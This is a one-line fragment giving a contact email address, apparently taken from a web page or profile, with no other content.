Email: jattceo@gmail.com